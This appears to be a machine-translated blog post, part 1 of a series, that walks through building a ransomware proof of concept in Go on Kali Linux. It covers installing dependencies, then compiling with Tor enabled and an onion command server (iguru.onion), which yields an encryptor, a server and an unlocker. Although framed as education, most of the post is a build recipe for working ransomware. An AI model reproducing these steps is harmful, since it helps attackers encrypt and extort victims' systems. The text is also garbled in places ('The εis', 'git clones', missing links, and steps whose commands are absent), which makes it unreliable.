Make Your Own Ransomware, (Part 1)

The εis fast becoming the most important form of malware affecting our digital systems. Companies around the world are being hit by various forms of malware, including the new pars, Snake, designed specifically for SCADA/ICS systems. Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the risk this ransomware poses to a nation's industrial systems and infrastructure.

Recently, the major American insurance company, CNA, admitted to paying a ransom of 40 million dollars! No wonder ransomware developers are getting more creative and malicious, because ransomware pays!


To understand how ransomware works let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on He developed this ransomware as part of his academic program and it is not designed for malicious purposes, but rather to help us understand how ransomware works. The malware is written in Golang like most.

It encrypts files in the background with AES-256-CTR and uses RSA-4096 to secure data exchange with the server. This particular ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.

Step #1: Download and Install Binaries

The first step is to enable Kali and make sure golang is installed. If not, download it from the Kali repositories by entering,

kali > sudo apt install golang

Then you will need to login as root user.

kali > sudo su -


Now create a directory for the binaries. In this case, I simply named it “git”.

kali >mkdir git

Then change directory (cd) to that directory.

kali > cd git

Then download them binaries from github.

kali > git clones


Step #2: Export GO environment variables

Next, we need to set some environment variables to direct them binaries and GO to the appropriate directories.


Step #3: Build the source code dependencies

Now, with the variables set and exported, we need to create the dependencies. Navigate to the new directory, ransomware, and type make deps.

kali > cd ransomware

kali > make deps


Step #4: Build the source code with options

Now that we have completed deps make, we can start building the source code. In our case, we will use a few options.

First, we want to use ToR to encrypt our communications over the ToR network.


Second, we want to use the dark web server us at iguru.onion (you can use any domain or localhost).


Third, we want to use port 80 (you can use any port).


Finally, we want to set the operating system to compile the source code for our operating system, in this case Linux.



Our command should look something like this,

kali > make -e USE_TOR=true SERVER_HOST=iguru.onion SERVER_PORT=80 GOOS=linux

Finally press ENTER and monitor your ransomware syntax.

Step #5: Check the directory for ransomware.exe

Once the source code is generated, see the list in the ransomware directory.

kali > ls -l


Now, navigate to the directory .

kali > cd bin


Here, you will see ransomware.exe, server and unlocker.exe.

Step #6: Consider the types of files to encrypt

If you want to see what types of files the ransomware will encrypt, go to the cmd directory and open it common.go

kali > cd cmd

kali > more common.go


Here, you can see the file extensions that the ransomware aims to encrypt when executed.


Ransomware is perhaps the biggest threat to our digital systems right now. As the Colonial Pipeline attack clearly demonstrated, almost everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant financial and infrastructure impacts!

This ransomware POC will help you better understand ransomware as a threat and check if your systems are vulnerable to such an attack.

In the second part of this series, we will test this ransomware on a Windows VM. The Best Technology Site in Greecefgns

Subscribe to Blog by Email

Subscribe to this blog and receive notifications of new posts by email.


Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).